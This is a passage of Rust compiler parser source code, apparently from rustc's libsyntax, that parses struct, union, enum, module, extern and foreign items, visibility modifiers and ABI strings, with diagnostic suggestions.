/// Parses `struct Foo { ... }`.
fn parse_item_struct(&mut self) -> PResult<'a, ItemInfo> {
let class_name = self.parse_ident()?;
let mut generics = self.parse_generics()?;
// There is a special case worth noting here, as reported in issue #17904.
// If we are parsing a tuple struct it is the case that the where clause
// should follow the field list. Like so:
//
// struct Foo<T>(T) where T: Copy;
//
// If we are parsing a normal record-style struct it is the case
// that the where clause comes before the body, and after the generics.
// So if we look ahead and see a brace or a where-clause we begin
// parsing a record style struct.
//
// Otherwise if we look ahead and see a paren we parse a tuple-style
// struct.
let vdata = if self.token.is_keyword(kw::Where) {
generics.where_clause = self.parse_where_clause()?;
if self.eat(&token::Semi) {
// If we see a: `struct Foo<T> where T: Copy;` style decl.
VariantData::Unit(ast::DUMMY_NODE_ID)
} else {
// If we see: `struct Foo<T> where T: Copy { ... }`
let (fields, recovered) = self.parse_record_struct_body()?;
VariantData::Struct(fields, recovered)
}
// No `where` so: `struct Foo<T>;`
} else if self.eat(&token::Semi) {
VariantData::Unit(ast::DUMMY_NODE_ID)
// Record-style struct definition
} else if self.token == token::OpenDelim(token::Brace) {
let (fields, recovered) = self.parse_record_struct_body()?;
VariantData::Struct(fields, recovered)
// Tuple-style struct definition with optional where-clause.
} else if self.token == token::OpenDelim(token::Paren) {
let body = VariantData::Tuple(self.parse_tuple_struct_body()?, ast::DUMMY_NODE_ID);
generics.where_clause = self.parse_where_clause()?;
self.expect(&token::Semi)?;
body
} else {
let token_str = self.this_token_descr();
let mut err = self.fatal(&format!(
"expected `where`, `{{`, `(`, or `;` after struct name, found {}",
token_str
));
err.span_label(self.span, "expected `where`, `{`, `(`, or `;` after struct name");
return Err(err);
};
Ok((class_name, ItemKind::Struct(vdata, generics), None))
}
/// Parses `union Foo { ... }`.
fn parse_item_union(&mut self) -> PResult<'a, ItemInfo> {
let class_name = self.parse_ident()?;
let mut generics = self.parse_generics()?;
let vdata = if self.token.is_keyword(kw::Where) {
generics.where_clause = self.parse_where_clause()?;
let (fields, recovered) = self.parse_record_struct_body()?;
VariantData::Struct(fields, recovered)
} else if self.token == token::OpenDelim(token::Brace) {
let (fields, recovered) = self.parse_record_struct_body()?;
VariantData::Struct(fields, recovered)
} else {
let token_str = self.this_token_descr();
let mut err = self.fatal(&format!(
"expected `where` or `{{` after union name, found {}", token_str));
err.span_label(self.span, "expected `where` or `{` after union name");
return Err(err);
};
Ok((class_name, ItemKind::Union(vdata, generics), None))
}
fn parse_record_struct_body(
&mut self,
) -> PResult<'a, (Vec<StructField>, /* recovered */ bool)> {
let mut fields = Vec::new();
let mut recovered = false;
if self.eat(&token::OpenDelim(token::Brace)) {
while self.token != token::CloseDelim(token::Brace) {
let field = self.parse_struct_decl_field().map_err(|e| {
self.recover_stmt();
recovered = true;
e
});
match field {
Ok(field) => fields.push(field),
Err(mut err) => {
err.emit();
}
}
}
self.eat(&token::CloseDelim(token::Brace));
} else {
let token_str = self.this_token_descr();
let mut err = self.fatal(&format!(
"expected `where`, or `{{` after struct name, found {}", token_str));
err.span_label(self.span, "expected `where`, or `{` after struct name");
return Err(err);
}
Ok((fields, recovered))
}
fn parse_tuple_struct_body(&mut self) -> PResult<'a, Vec<StructField>> {
// This is the case where we find `struct Foo<T>(T) where T: Copy;`
// Unit like structs are handled in parse_item_struct function
let fields = self.parse_unspanned_seq(
&token::OpenDelim(token::Paren),
&token::CloseDelim(token::Paren),
SeqSep::trailing_allowed(token::Comma),
|p| {
let attrs = p.parse_outer_attributes()?;
let lo = p.span;
let vis = p.parse_visibility(true)?;
let ty = p.parse_ty()?;
Ok(StructField {
span: lo.to(ty.span),
vis,
ident: None,
id: ast::DUMMY_NODE_ID,
ty,
attrs,
})
})?;
Ok(fields)
}
/// Parses a structure field declaration.
fn parse_single_struct_field(&mut self,
lo: Span,
vis: Visibility,
attrs: Vec<Attribute> )
-> PResult<'a, StructField> {
let mut seen_comma: bool = false;
let a_var = self.parse_name_and_ty(lo, vis, attrs)?;
if self.token == token::Comma {
seen_comma = true;
}
match self.token {
token::Comma => {
self.bump();
}
token::CloseDelim(token::Brace) => {}
token::DocComment(_) => {
let previous_span = self.prev_span;
let mut err = self.span_fatal_err(self.span, Error::UselessDocComment);
self.bump(); // consume the doc comment
let comma_after_doc_seen = self.eat(&token::Comma);
// `seen_comma` is always false, because we are inside doc block
// condition is here to make code more readable
if seen_comma == false && comma_after_doc_seen == true {
seen_comma = true;
}
if comma_after_doc_seen || self.token == token::CloseDelim(token::Brace) {
err.emit();
} else {
if seen_comma == false {
let sp = self.sess.source_map().next_point(previous_span);
err.span_suggestion(
sp,
"missing comma here",
",".into(),
Applicability::MachineApplicable
);
}
return Err(err);
}
}
_ => {
let sp = self.sess.source_map().next_point(self.prev_span);
let mut err = self.struct_span_err(sp, &format!("expected `,`, or `}}`, found {}",
self.this_token_descr()));
if self.token.is_ident() {
// This is likely another field; emit the diagnostic and keep going
err.span_suggestion(
sp,
"try adding a comma",
",".into(),
Applicability::MachineApplicable,
);
err.emit();
} else {
return Err(err)
}
}
}
Ok(a_var)
}
/// Parses an element of a struct declaration.
fn parse_struct_decl_field(&mut self) -> PResult<'a, StructField> {
let attrs = self.parse_outer_attributes()?;
let lo = self.span;
let vis = self.parse_visibility(false)?;
self.parse_single_struct_field(lo, vis, attrs)
}
/// Parses `pub`, `pub(crate)` and `pub(in path)` plus shortcuts `crate` for `pub(crate)`,
/// `pub(self)` for `pub(in self)` and `pub(super)` for `pub(in super)`.
/// If the following element can't be a tuple (i.e., it's a function definition), then
/// it's not a tuple struct field), and the contents within the parentheses isn't valid,
/// so emit a proper diagnostic.
pub fn parse_visibility(&mut self, can_take_tuple: bool) -> PResult<'a, Visibility> {
maybe_whole!(self, NtVis, |x| x);
self.expected_tokens.push(TokenType::Keyword(kw::Crate));
if self.is_crate_vis() {
self.bump(); // `crate`
return Ok(respan(self.prev_span, VisibilityKind::Crate(CrateSugar::JustCrate)));
}
if !self.eat_keyword(kw::Pub) {
// We need a span for our `Spanned<VisibilityKind>`, but there's inherently no
// keyword to grab a span from for inherited visibility; an empty span at the
// beginning of the current token would seem to be the "Schelling span".
return Ok(respan(self.span.shrink_to_lo(), VisibilityKind::Inherited))
}
let lo = self.prev_span;
if self.check(&token::OpenDelim(token::Paren)) {
// We don't `self.bump()` the `(` yet because this might be a struct definition where
// `()` or a tuple might be allowed. For example, `struct Struct(pub (), pub (usize));`.
// Because of this, we only `bump` the `(` if we're assured it is appropriate to do so
// by the following tokens.
if self.is_keyword_ahead(1, &[kw::Crate]) &&
self.look_ahead(2, |t| t != &token::ModSep) // account for `pub(crate::foo)`
{
// `pub(crate)`
self.bump(); // `(`
self.bump(); // `crate`
self.expect(&token::CloseDelim(token::Paren))?; // `)`
let vis = respan(
lo.to(self.prev_span),
VisibilityKind::Crate(CrateSugar::PubCrate),
);
return Ok(vis)
} else if self.is_keyword_ahead(1, &[kw::In]) {
// `pub(in path)`
self.bump(); // `(`
self.bump(); // `in`
let path = self.parse_path(PathStyle::Mod)?; // `path`
self.expect(&token::CloseDelim(token::Paren))?; // `)`
let vis = respan(lo.to(self.prev_span), VisibilityKind::Restricted {
path: P(path),
id: ast::DUMMY_NODE_ID,
});
return Ok(vis)
} else if self.look_ahead(2, |t| t == &token::CloseDelim(token::Paren)) &&
self.is_keyword_ahead(1, &[kw::Super, kw::SelfLower])
{
// `pub(self)` or `pub(super)`
self.bump(); // `(`
let path = self.parse_path(PathStyle::Mod)?; // `super`/`self`
self.expect(&token::CloseDelim(token::Paren))?; // `)`
let vis = respan(lo.to(self.prev_span), VisibilityKind::Restricted {
path: P(path),
id: ast::DUMMY_NODE_ID,
});
return Ok(vis)
} else if !can_take_tuple { // Provide this diagnostic if this is not a tuple struct
// `pub(something) fn ...` or `struct X { pub(something) y: Z }`
self.bump(); // `(`
let msg = "incorrect visibility restriction";
let suggestion = r##"some possible visibility restrictions are:
`pub(crate)`: visible only on the current crate
`pub(super)`: visible only in the current module's parent
`pub(in path::to::module)`: visible only on the specified path"##;
let path = self.parse_path(PathStyle::Mod)?;
let sp = path.span;
let help_msg = format!("make this visible only to module `{}` with `in`", path);
self.expect(&token::CloseDelim(token::Paren))?; // `)`
let mut err = struct_span_err!(self.sess.span_diagnostic, sp, E0704, "{}", msg);
err.help(suggestion);
err.span_suggestion(
sp, &help_msg, format!("in {}", path), Applicability::MachineApplicable
);
err.emit(); // emit diagnostic, but continue with public visibility
}
}
Ok(respan(lo, VisibilityKind::Public))
}
/// Parses defaultness (i.e., `default` or nothing).
fn parse_defaultness(&mut self) -> Defaultness {
// `pub` is included for better error messages
if self.check_keyword(kw::Default) &&
self.is_keyword_ahead(1, &[
kw::Impl,
kw::Const,
kw::Fn,
kw::Unsafe,
kw::Extern,
kw::Type,
kw::Pub,
])
{
self.bump(); // `default`
Defaultness::Default
} else {
Defaultness::Final
}
}
/// Given a termination token, parses all of the items in a module.
fn parse_mod_items(&mut self, term: &token::Token, inner_lo: Span) -> PResult<'a, Mod> {
let mut items = vec![];
while let Some(item) = self.parse_item()? {
items.push(item);
self.maybe_consume_incorrect_semicolon(&items);
}
if !self.eat(term) {
let token_str = self.this_token_descr();
if !self.maybe_consume_incorrect_semicolon(&items) {
let mut err = self.fatal(&format!("expected item, found {}", token_str));
err.span_label(self.span, "expected item");
return Err(err);
}
}
let hi = if self.span.is_dummy() {
inner_lo
} else {
self.prev_span
};
Ok(ast::Mod {
inner: inner_lo.to(hi),
items,
inline: true
})
}
fn parse_item_const(&mut self, m: Option<Mutability>) -> PResult<'a, ItemInfo> {
let id = if m.is_none() { self.parse_ident_or_underscore() } else { self.parse_ident() }?;
self.expect(&token::Colon)?;
let ty = self.parse_ty()?;
self.expect(&token::Eq)?;
let e = self.parse_expr()?;
self.expect(&token::Semi)?;
let item = match m {
Some(m) => ItemKind::Static(ty, m, e),
None => ItemKind::Const(ty, e),
};
Ok((id, item, None))
}
/// Parse a `mod <foo> { ... }` or `mod <foo>;` item
fn parse_item_mod(&mut self, outer_attrs: &[Attribute]) -> PResult<'a, ItemInfo> {
let (in_cfg, outer_attrs) = {
let mut strip_unconfigured = crate::config::StripUnconfigured {
sess: self.sess,
features: None, // don't perform gated feature checking
};
let mut outer_attrs = outer_attrs.to_owned();
strip_unconfigured.process_cfg_attrs(&mut outer_attrs);
(!self.cfg_mods || strip_unconfigured.in_cfg(&outer_attrs), outer_attrs)
};
let id_span = self.span;
let id = self.parse_ident()?;
if self.eat(&token::Semi) {
if in_cfg && self.recurse_into_file_modules {
// This mod is in an external file. Let's go get it!
let ModulePathSuccess { path, directory_ownership, warn } =
self.submod_path(id, &outer_attrs, id_span)?;
let (module, mut attrs) =
self.eval_src_mod(path, directory_ownership, id.to_string(), id_span)?;
// Record that we fetched the mod from an external file
if warn {
let attr = Attribute {
id: attr::mk_attr_id(),
style: ast::AttrStyle::Outer,
path: ast::Path::from_ident(
Ident::with_empty_ctxt(sym::warn_directory_ownership)),
tokens: TokenStream::empty(),
is_sugared_doc: false,
span: DUMMY_SP,
};
attr::mark_known(&attr);
attrs.push(attr);
}
Ok((id, ItemKind::Mod(module), Some(attrs)))
} else {
let placeholder = ast::Mod {
inner: DUMMY_SP,
items: Vec::new(),
inline: false
};
Ok((id, ItemKind::Mod(placeholder), None))
}
} else {
let old_directory = self.directory.clone();
self.push_directory(id, &outer_attrs);
self.expect(&token::OpenDelim(token::Brace))?;
let mod_inner_lo = self.span;
let attrs = self.parse_inner_attributes()?;
let module = self.parse_mod_items(&token::CloseDelim(token::Brace), mod_inner_lo)?;
self.directory = old_directory;
Ok((id, ItemKind::Mod(module), Some(attrs)))
}
}
fn push_directory(&mut self, id: Ident, attrs: &[Attribute]) {
if let Some(path) = attr::first_attr_value_str_by_name(attrs, sym::path) {
self.directory.path.to_mut().push(&path.as_str());
self.directory.ownership = DirectoryOwnership::Owned { relative: None };
} else {
// We have to push on the current module name in the case of relative
// paths in order to ensure that any additional module paths from inline
// `mod x { ... }` come after the relative extension.
//
// For example, a `mod z { ... }` inside `x/y.rs` should set the current
// directory path to `/x/y/z`, not `/x/z` with a relative offset of `y`.
if let DirectoryOwnership::Owned { relative } = &mut self.directory.ownership {
if let Some(ident) = relative.take() { // remove the relative offset
self.directory.path.to_mut().push(ident.as_str());
}
}
self.directory.path.to_mut().push(&id.as_str());
}
}
pub fn submod_path_from_attr(attrs: &[Attribute], dir_path: &Path) -> Option<PathBuf> {
if let Some(s) = attr::first_attr_value_str_by_name(attrs, sym::path) {
let s = s.as_str();
// On windows, the base path might have the form
// `\\?\foo\bar` in which case it does not tolerate
// mixed `/` and `\` separators, so canonicalize
// `/` to `\`.
#[cfg(windows)]
let s = s.replace("/", "\\");
Some(dir_path.join(s))
} else {
None
}
}
/// Returns a path to a module.
pub fn default_submod_path(
id: ast::Ident,
relative: Option<ast::Ident>,
dir_path: &Path,
source_map: &SourceMap) -> ModulePath
{
// If we're in a foo.rs file instead of a mod.rs file,
// we need to look for submodules in
// `./foo/<id>.rs` and `./foo/<id>/mod.rs` rather than
// `./<id>.rs` and `./<id>/mod.rs`.
let relative_prefix_string;
let relative_prefix = if let Some(ident) = relative {
relative_prefix_string = format!("{}{}", ident.as_str(), path::MAIN_SEPARATOR);
&relative_prefix_string
} else {
""
};
let mod_name = id.to_string();
let default_path_str = format!("{}{}.rs", relative_prefix, mod_name);
let secondary_path_str = format!("{}{}{}mod.rs",
relative_prefix, mod_name, path::MAIN_SEPARATOR);
let default_path = dir_path.join(&default_path_str);
let secondary_path = dir_path.join(&secondary_path_str);
let default_exists = source_map.file_exists(&default_path);
let secondary_exists = source_map.file_exists(&secondary_path);
let result = match (default_exists, secondary_exists) {
(true, false) => Ok(ModulePathSuccess {
path: default_path,
directory_ownership: DirectoryOwnership::Owned {
relative: Some(id),
},
warn: false,
}),
(false, true) => Ok(ModulePathSuccess {
path: secondary_path,
directory_ownership: DirectoryOwnership::Owned {
relative: None,
},
warn: false,
}),
(false, false) => Err(Error::FileNotFoundForModule {
mod_name: mod_name.clone(),
default_path: default_path_str,
secondary_path: secondary_path_str,
dir_path: dir_path.display().to_string(),
}),
(true, true) => Err(Error::DuplicatePaths {
mod_name: mod_name.clone(),
default_path: default_path_str,
secondary_path: secondary_path_str,
}),
};
ModulePath {
name: mod_name,
path_exists: default_exists || secondary_exists,
result,
}
}
fn submod_path(&mut self,
id: ast::Ident,
outer_attrs: &[Attribute],
id_sp: Span)
-> PResult<'a, ModulePathSuccess> {
if let Some(path) = Parser::submod_path_from_attr(outer_attrs, &self.directory.path) {
return Ok(ModulePathSuccess {
directory_ownership: match path.file_name().and_then(|s| s.to_str()) {
// All `#[path]` files are treated as though they are a `mod.rs` file.
// This means that `mod foo;` declarations inside `#[path]`-included
// files are siblings,
//
// Note that this will produce weirdness when a file named `foo.rs` is
// `#[path]` included and contains a `mod foo;` declaration.
// If you encounter this, it's your own darn fault :P
Some(_) => DirectoryOwnership::Owned { relative: None },
_ => DirectoryOwnership::UnownedViaMod(true),
},
path,
warn: false,
});
}
let relative = match self.directory.ownership {
DirectoryOwnership::Owned { relative } => relative,
DirectoryOwnership::UnownedViaBlock |
DirectoryOwnership::UnownedViaMod(_) => None,
};
let paths = Parser::default_submod_path(
id, relative, &self.directory.path, self.sess.source_map());
match self.directory.ownership {
DirectoryOwnership::Owned { .. } => {
paths.result.map_err(|err| self.span_fatal_err(id_sp, err))
},
DirectoryOwnership::UnownedViaBlock => {
let msg =
"Cannot declare a non-inline module inside a block \
unless it has a path attribute";
let mut err = self.diagnostic().struct_span_err(id_sp, msg);
if paths.path_exists {
let msg = format!("Maybe `use` the module `{}` instead of redeclaring it",
paths.name);
err.span_note(id_sp, &msg);
}
Err(err)
}
DirectoryOwnership::UnownedViaMod(warn) => {
if warn {
if let Ok(result) = paths.result {
return Ok(ModulePathSuccess { warn: true, ..result });
}
}
let mut err = self.diagnostic().struct_span_err(id_sp,
"cannot declare a new module at this location");
if !id_sp.is_dummy() {
let src_path = self.sess.source_map().span_to_filename(id_sp);
if let FileName::Real(src_path) = src_path {
if let Some(stem) = src_path.file_stem() {
let mut dest_path = src_path.clone();
dest_path.set_file_name(stem);
dest_path.push("mod.rs");
err.span_note(id_sp,
&format!("maybe move this module `{}` to its own \
directory via `{}`", src_path.display(),
dest_path.display()));
}
}
}
if paths.path_exists {
err.span_note(id_sp,
&format!("... or maybe `use` the module `{}` instead \
of possibly redeclaring it",
paths.name));
}
Err(err)
}
}
}
/// Reads a module from a source file.
fn eval_src_mod(&mut self,
path: PathBuf,
directory_ownership: DirectoryOwnership,
name: String,
id_sp: Span)
-> PResult<'a, (ast::Mod, Vec<Attribute> )> {
let mut included_mod_stack = self.sess.included_mod_stack.borrow_mut();
if let Some(i) = included_mod_stack.iter().position(|p| *p == path) {
let mut err = String::from("circular modules: ");
let len = included_mod_stack.len();
for p in &included_mod_stack[i.. len] {
err.push_str(&p.to_string_lossy());
err.push_str(" -> ");
}
err.push_str(&path.to_string_lossy());
return Err(self.span_fatal(id_sp, &err[..]));
}
included_mod_stack.push(path.clone());
drop(included_mod_stack);
let mut p0 =
new_sub_parser_from_file(self.sess, &path, directory_ownership, Some(name), id_sp);
p0.cfg_mods = self.cfg_mods;
let mod_inner_lo = p0.span;
let mod_attrs = p0.parse_inner_attributes()?;
let mut m0 = p0.parse_mod_items(&token::Eof, mod_inner_lo)?;
m0.inline = false;
self.sess.included_mod_stack.borrow_mut().pop();
Ok((m0, mod_attrs))
}
/// Parses a function declaration from a foreign module.
fn parse_item_foreign_fn(&mut self, vis: ast::Visibility, lo: Span, attrs: Vec<Attribute>)
-> PResult<'a, ForeignItem> {
self.expect_keyword(kw::Fn)?;
let (ident, mut generics) = self.parse_fn_header()?;
let decl = self.parse_fn_decl(true)?;
generics.where_clause = self.parse_where_clause()?;
let hi = self.span;
self.expect(&token::Semi)?;
Ok(ast::ForeignItem {
ident,
attrs,
node: ForeignItemKind::Fn(decl, generics),
id: ast::DUMMY_NODE_ID,
span: lo.to(hi),
vis,
})
}
/// Parses a static item from a foreign module.
/// Assumes that the `static` keyword is already parsed.
fn parse_item_foreign_static(&mut self, vis: ast::Visibility, lo: Span, attrs: Vec<Attribute>)
-> PResult<'a, ForeignItem> {
let mutbl = self.parse_mutability();
let ident = self.parse_ident()?;
self.expect(&token::Colon)?;
let ty = self.parse_ty()?;
let hi = self.span;
self.expect(&token::Semi)?;
Ok(ForeignItem {
ident,
attrs,
node: ForeignItemKind::Static(ty, mutbl),
id: ast::DUMMY_NODE_ID,
span: lo.to(hi),
vis,
})
}
/// Parses a type from a foreign module.
fn parse_item_foreign_type(&mut self, vis: ast::Visibility, lo: Span, attrs: Vec<Attribute>)
-> PResult<'a, ForeignItem> {
self.expect_keyword(kw::Type)?;
let ident = self.parse_ident()?;
let hi = self.span;
self.expect(&token::Semi)?;
Ok(ast::ForeignItem {
ident: ident,
attrs: attrs,
node: ForeignItemKind::Ty,
id: ast::DUMMY_NODE_ID,
span: lo.to(hi),
vis: vis
})
}
fn parse_crate_name_with_dashes(&mut self) -> PResult<'a, ast::Ident> {
let error_msg = "crate name using dashes are not valid in `extern crate` statements";
let suggestion_msg = "if the original crate name uses dashes you need to use underscores \
in the code";
let mut ident = if self.token.is_keyword(kw::SelfLower) {
self.parse_path_segment_ident()
} else {
self.parse_ident()
}?;
let mut idents = vec![];
let mut replacement = vec![];
let mut fixed_crate_name = false;
// Accept `extern crate name-like-this` for better diagnostics
let dash = token::Token::BinOp(token::BinOpToken::Minus);
if self.token == dash { // Do not include `-` as part of the expected tokens list
while self.eat(&dash) {
fixed_crate_name = true;
replacement.push((self.prev_span, "_".to_string()));
idents.push(self.parse_ident()?);
}
}
if fixed_crate_name {
let fixed_name_sp = ident.span.to(idents.last().unwrap().span);
let mut fixed_name = format!("{}", ident.name);
for part in idents {
fixed_name.push_str(&format!("_{}", part.name));
}
ident = Ident::from_str(&fixed_name).with_span_pos(fixed_name_sp);
let mut err = self.struct_span_err(fixed_name_sp, error_msg);
err.span_label(fixed_name_sp, "dash-separated idents are not valid");
err.multipart_suggestion(
suggestion_msg,
replacement,
Applicability::MachineApplicable,
);
err.emit();
}
Ok(ident)
}
/// Parses `extern crate` links.
///
/// # Examples
///
/// ```
/// extern crate foo;
/// extern crate bar as foo;
/// ```
fn parse_item_extern_crate(&mut self,
lo: Span,
visibility: Visibility,
attrs: Vec<Attribute>)
-> PResult<'a, P<Item>> {
// Accept `extern crate name-like-this` for better diagnostics
let orig_name = self.parse_crate_name_with_dashes()?;
let (item_name, orig_name) = if let Some(rename) = self.parse_rename()? {
(rename, Some(orig_name.name))
} else {
(orig_name, None)
};
self.expect(&token::Semi)?;
let span = lo.to(self.prev_span);
Ok(self.mk_item(span, item_name, ItemKind::ExternCrate(orig_name), visibility, attrs))
}
/// Parses `extern` for foreign ABIs modules.
///
/// `extern` is expected to have been
/// consumed before calling this method.
///
/// # Examples
///
/// ```ignore (only-for-syntax-highlight)
/// extern "C" {}
/// extern {}
/// ```
fn parse_item_foreign_mod(&mut self,
lo: Span,
opt_abi: Option<Abi>,
visibility: Visibility,
mut attrs: Vec<Attribute>)
-> PResult<'a, P<Item>> {
self.expect(&token::OpenDelim(token::Brace))?;
let abi = opt_abi.unwrap_or(Abi::C);
attrs.extend(self.parse_inner_attributes()?);
let mut foreign_items = vec![];
while !self.eat(&token::CloseDelim(token::Brace)) {
foreign_items.push(self.parse_foreign_item()?);
}
let prev_span = self.prev_span;
let m = ast::ForeignMod {
abi,
items: foreign_items
};
let invalid = Ident::invalid();
Ok(self.mk_item(lo.to(prev_span), invalid, ItemKind::ForeignMod(m), visibility, attrs))
}
/// Parses `type Foo = Bar;`
/// or
/// `existential type Foo: Bar;`
/// or
/// `return `None``
/// without modifying the parser state.
fn eat_type(&mut self) -> Option<PResult<'a, (Ident, AliasKind, ast::Generics)>> {
// This parses the grammar:
// Ident ["<"...">"] ["where" ...] ("=" | ":") Ty ";"
if self.check_keyword(kw::Type) ||
self.check_keyword(kw::Existential) &&
self.is_keyword_ahead(1, &[kw::Type]) {
let existential = self.eat_keyword(kw::Existential);
assert!(self.eat_keyword(kw::Type));
Some(self.parse_existential_or_alias(existential))
} else {
None
}
}
/// Parses a type alias or existential type.
fn parse_existential_or_alias(
&mut self,
existential: bool,
) -> PResult<'a, (Ident, AliasKind, ast::Generics)> {
let ident = self.parse_ident()?;
let mut tps = self.parse_generics()?;
tps.where_clause = self.parse_where_clause()?;
let alias = if existential {
self.expect(&token::Colon)?;
let bounds = self.parse_generic_bounds(Some(self.prev_span))?;
AliasKind::Existential(bounds)
} else {
self.expect(&token::Eq)?;
let ty = self.parse_ty()?;
AliasKind::Weak(ty)
};
self.expect(&token::Semi)?;
Ok((ident, alias, tps))
}
/// Parses the part of an enum declaration following the `{`.
fn parse_enum_def(&mut self, _generics: &ast::Generics) -> PResult<'a, EnumDef> {
let mut variants = Vec::new();
let mut any_disr = vec![];
while self.token != token::CloseDelim(token::Brace) {
let variant_attrs = self.parse_outer_attributes()?;
let vlo = self.span;
let struct_def;
let mut disr_expr = None;
self.eat_bad_pub();
let ident = self.parse_ident()?;
if self.check(&token::OpenDelim(token::Brace)) {
// Parse a struct variant.
let (fields, recovered) = self.parse_record_struct_body()?;
struct_def = VariantData::Struct(fields, recovered);
} else if self.check(&token::OpenDelim(token::Paren)) {
struct_def = VariantData::Tuple(
self.parse_tuple_struct_body()?,
ast::DUMMY_NODE_ID,
);
} else if self.eat(&token::Eq) {
disr_expr = Some(AnonConst {
id: ast::DUMMY_NODE_ID,
value: self.parse_expr()?,
});
if let Some(sp) = disr_expr.as_ref().map(|c| c.value.span) {
any_disr.push(sp);
}
struct_def = VariantData::Unit(ast::DUMMY_NODE_ID);
} else {
struct_def = VariantData::Unit(ast::DUMMY_NODE_ID);
}
let vr = ast::Variant_ {
ident,
id: ast::DUMMY_NODE_ID,
attrs: variant_attrs,
data: struct_def,
disr_expr,
};
variants.push(respan(vlo.to(self.prev_span), vr));
if !self.eat(&token::Comma) {
if self.token.is_ident() && !self.token.is_reserved_ident() {
let sp = self.sess.source_map().next_point(self.prev_span);
let mut err = self.struct_span_err(sp, "missing comma");
err.span_suggestion_short(
sp,
"missing comma",
",".to_owned(),
Applicability::MaybeIncorrect,
);
err.emit();
} else {
break;
}
}
}
self.expect(&token::CloseDelim(token::Brace))?;
self.maybe_report_invalid_custom_discriminants(any_disr, &variants);
Ok(ast::EnumDef { variants })
}
/// Parses an enum declaration.
fn parse_item_enum(&mut self) -> PResult<'a, ItemInfo> {
let id = self.parse_ident()?;
let mut generics = self.parse_generics()?;
generics.where_clause = self.parse_where_clause()?;
self.expect(&token::OpenDelim(token::Brace))?;
let enum_definition = self.parse_enum_def(&generics).map_err(|e| {
self.recover_stmt();
self.eat(&token::CloseDelim(token::Brace));
e
})?;
Ok((id, ItemKind::Enum(enum_definition, generics), None))
}
/// Parses a string as an ABI spec on an extern type or module. Consumes
/// the `extern` keyword, if one is found.
fn parse_opt_abi(&mut self) -> PResult<'a, Option<Abi>> {
match self.token {
token::Literal(token::Lit { kind: token::Str, symbol, suffix }) |
token::Literal(token::Lit { kind: token::StrRaw(..), symbol, suffix }) => {
let sp = self.span;
self.expect_no_suffix(sp, "an ABI spec", suffix);
self.bump();
match abi::lookup(&symbol.as_str()) {
Some(abi) => Ok(Some(abi)),
None => {
let prev_span = self.prev_span;
let mut err = struct_span_err!(
self.sess.span_diagnostic,
prev_span,
E0703,
"invalid ABI: found `{}`",
symbol);
err.span_label(prev_span, "invalid ABI");
err.help(&format!("valid ABIs: {}", abi::all_names().join(", ")));
err.emit();
Ok(None)
}
}
}
_ => Ok(None),
}
}
fn is_static_global(&mut self) -> bool {
if self.check_keyword(kw::Static) {
// Check if this could be a closure
!self.look_ahead(1, |token| {
if token.is_keyword(kw::Move) {
return true;
}
match *token {
token::BinOp(token::Or) | token::OrOr => true,
_ => false,
}
})
} else {
false
}
}
fn parse_item_(
&mut self,
attrs: Vec<Attribute>,
macros_allowed: bool,
attributes_allowed: bool,
) -> PResult<'a, Option<P<Item>>> {
let mut unclosed_delims = vec![];
let (ret, tokens) = self.collect_tokens(|this| {
let item = this.parse_item_implementation(attrs, macros_allowed, attributes_allowed);
unclosed_delims.append(&mut this.unclosed_delims);
item
})?;
self.unclosed_delims.append(&mut unclosed_delims);
// Once we've parsed an item and recorded the tokens we got while
// parsing we may want to store `tokens` into the item we're about to
// return. Note, though, that we specifically didn't capture tokens
// related to outer attributes. The `tokens` field here may later be
// used with procedural macros to convert this item back into a token
// stream, but during expansion we may be removing attributes as we go
// along.
//
// If we've got inner attributes then the `tokens` we've got above holds
// these inner attributes. If an inner attribute is expanded we won't
// actually remove it from the token stream, so we'll just keep yielding
// it (bad!). To work around this case for now we just avoid recording
// `tokens` if we detect any inner attributes. This should help keep
// expansion correct, but we should fix this bug one day!
Ok(ret.map(|item| {
item.map(|mut i| {
if !i.attrs.iter().any(|attr| attr.style == AttrStyle::Inner) {
i.tokens = Some(tokens);
}
i
})
}))
}
/// Parses one of the items allowed by the flags.
fn parse_item_implementation(
&mut self,
attrs: Vec<Attribute>,
macros_allowed: bool,
attributes_allowed: bool,
) -> PResult<'a, Option<P<Item>>> {
maybe_whole!(self, NtItem, |item| {
let mut item = item.into_inner();
let mut attrs = attrs;
mem::swap(&mut item.attrs, &mut attrs);
item.attrs.extend(attrs);
Some(P(item))
});
let lo = self.span;
let visibility = self.parse_visibility(false)?;
if self.eat_keyword(kw::Use) {
// USE ITEM
let item_ = ItemKind::Use(P(self.parse_use_tree()?));
self.expect(&token::Semi)?;
let span = lo.to(self.prev_span);
let item =
self.mk_item(span, Ident::invalid(), item_, visibility, attrs);
return Ok(Some(item));
}
if self.eat_keyword(kw::Extern) {
if self.eat_keyword(kw::Crate) {
return Ok(Some(self.parse_item_extern_crate(lo, visibility, attrs)?));
}
let opt_abi = self.parse_opt_abi()?;
if self.eat_keyword(kw::Fn) {
// EXTERN FUNCTION ITEM
let fn_span = self.prev_span;
let abi = opt_abi.unwrap_or(Abi::C);
let (ident, item_, extra_attrs) =
self.parse_item_fn(Unsafety::Normal,
respan(fn_span, IsAsync::NotAsync),
respan(fn_span, Constness::NotConst),
abi)?;
let prev_span = self.prev_span;
let item = self.mk_item(lo.to(prev_span),
ident,
item_,
visibility,
maybe_append(attrs, extra_attrs));
return Ok(Some(item));
} else if self.check(&token::OpenDelim(token::Brace)) {
return Ok(Some(self.parse_item_foreign_mod(lo, opt_abi, visibility, attrs)?));
}
self.unexpected()?;
}
if self.is_static_global() {
self.bump();
// STATIC ITEM
let m = if self.eat_keyword(kw::Mut) {
Mutability::Mutable
} else {
Mutability::Immutable
};
let (ident, item_, extra_attrs) = self.parse_item_const(Some(m))?;
let prev_span = self.prev_span;
let item = self.mk_item(lo.to(prev_span),
ident,
item_,
visibility,
maybe_append(attrs, extra_attrs));
return Ok(Some(item));
}
if self.eat_keyword(kw::Const) {
let const_span = self.prev_span;
if self.check_keyword(kw::Fn)
|| (self.check_keyword(kw::Unsafe)
&& self.is_keyword_ahead(1, &[kw::Fn])) {
// CONST FUNCTION ITEM
let unsafety = self.parse_unsafety();
self.bump();
let (ident, item_, extra_attrs) =
self.parse_item_fn(unsafety,
respan(const_span, IsAsync::NotAsync),
respan(const_span, Constness::Const),
Abi::Rust)?;
let prev_span = self.prev_span;
let item = self.mk_item(lo.to(prev_span),
ident,
item_,
visibility,
maybe_append(attrs, extra_attrs));
return Ok(Some(item));
}
// CONST ITEM
if self.eat_keyword(kw::Mut) {
let prev_span = self.prev_span;
let mut err = self.diagnostic()
.struct_span_err(prev_span, "const globals cannot be mutable");
err.span_label(prev_span, "cannot be mutable");
err.span_suggestion(
